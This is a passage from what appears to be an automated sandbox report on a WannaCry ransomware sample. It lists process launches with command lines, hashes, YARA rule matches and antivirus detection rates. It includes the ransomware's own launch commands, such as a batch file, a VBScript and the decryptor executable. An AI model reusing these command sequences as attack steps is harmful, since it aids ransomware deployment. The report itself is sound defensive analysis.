                                                                              Path:C:\Windows\System32\backgroundTaskHost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppX3bn25b6f886wmg6twh46972vprk9tnbf.mca
                                                                              Imagebase:0x7ff6f3f20000
                                                                              File size:19'776 bytes
                                                                              MD5 hash:DA7063B17DBB8BBB3015351016868006
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              Target ID:23
                                                                              Start time:02:43:20
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
                                                                              • Detection: 96%, ReversingLabs
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              Target ID:24
                                                                              Start time:02:43:20
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              Target ID:25
                                                                              Start time:02:43:20
                                                                              Start date:04/10/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\system32\cmd.exe /c 7551728024260.bat
                                                                              Imagebase:0x7ff7ca9b0000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:26
                                                                              Start time:02:43:20
                                                                              Start date:04/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff772470000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:27
                                                                              Start time:02:43:21
                                                                              Start date:04/10/2024
                                                                              Path:C:\Windows\SysWOW64\cscript.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:cscript.exe //nologo m.vbs
                                                                              Imagebase:0x970000
                                                                              File size:144'896 bytes
                                                                              MD5 hash:CB601B41D4C8074BE8A84AED564A94DC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:28
                                                                              Start time:02:43:21
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:29
                                                                              Start time:02:43:21
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:30
                                                                              Start time:02:43:21
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:31
                                                                              Start time:02:43:21
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:32
                                                                              Start time:02:43:21
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:33
                                                                              Start time:02:43:22
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:34
                                                                              Start time:02:43:22
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:35
                                                                              Start time:02:43:22
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:36
                                                                              Start time:02:43:22
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:37
                                                                              Start time:02:43:23
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:38
                                                                              Start time:02:43:23
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:39
                                                                              Start time:02:43:23
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:40
                                                                              Start time:02:43:23
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:41
                                                                              Start time:02:43:23
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:42
                                                                              Start time:02:43:24
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:43
                                                                              Start time:02:43:24
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:44
                                                                              Start time:02:43:24
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:45
                                                                              Start time:02:43:24
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:46
                                                                              Start time:02:43:24
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:47
                                                                              Start time:02:43:25
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:48
                                                                              Start time:02:43:25
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:49
                                                                              Start time:02:43:25
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:50
                                                                              Start time:02:43:25
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:51
                                                                              Start time:02:43:26
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:52
                                                                              Start time:02:43:26
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:53
                                                                              Start time:02:43:26
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:54
                                                                              Start time:02:43:26
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:55
                                                                              Start time:02:43:26
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:56
                                                                              Start time:02:43:27
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:57
                                                                              Start time:02:43:27
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:58
                                                                              Start time:02:43:27
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:59
                                                                              Start time:02:43:27
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:60
                                                                              Start time:02:43:28
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:61
                                                                              Start time:02:43:28
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:62
                                                                              Start time:02:43:28
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:63
                                                                              Start time:02:43:28
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:64
                                                                              Start time:02:43:28
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:65
                                                                              Start time:02:43:29
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:66
                                                                              Start time:02:43:29
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:67
                                                                              Start time:02:43:29
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:68
                                                                              Start time:02:43:29
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:69
                                                                              Start time:02:43:30
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:70
                                                                              Start time:02:43:30
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:71
                                                                              Start time:02:43:30
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:72
                                                                              Start time:02:43:30
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:73
                                                                              Start time:02:43:30
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:74
                                                                              Start time:02:43:31
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:75
                                                                              Start time:02:43:31
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:76
                                                                              Start time:02:43:31
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:77
                                                                              Start time:02:43:31
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:78
                                                                              Start time:02:43:32
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:79
                                                                              Start time:02:43:32
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe co
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 0000004F.00000000.1576842950.000000000041F000.00000008.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, Author: Joe Security
                                                                              • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, Author: ReversingLabs
                                                                              Antivirus matches:
                                                                              • Detection: 97%, ReversingLabs
                                                                              Has exited:false

                                                                              Target ID:80
                                                                              Start time:02:43:32
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:81
                                                                              Start time:02:43:32
                                                                              Start date:04/10/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:cmd.exe /c start /b @WanaDecryptor@.exe vs
                                                                              Imagebase:0x960000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:82
                                                                              Start time:02:43:32
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
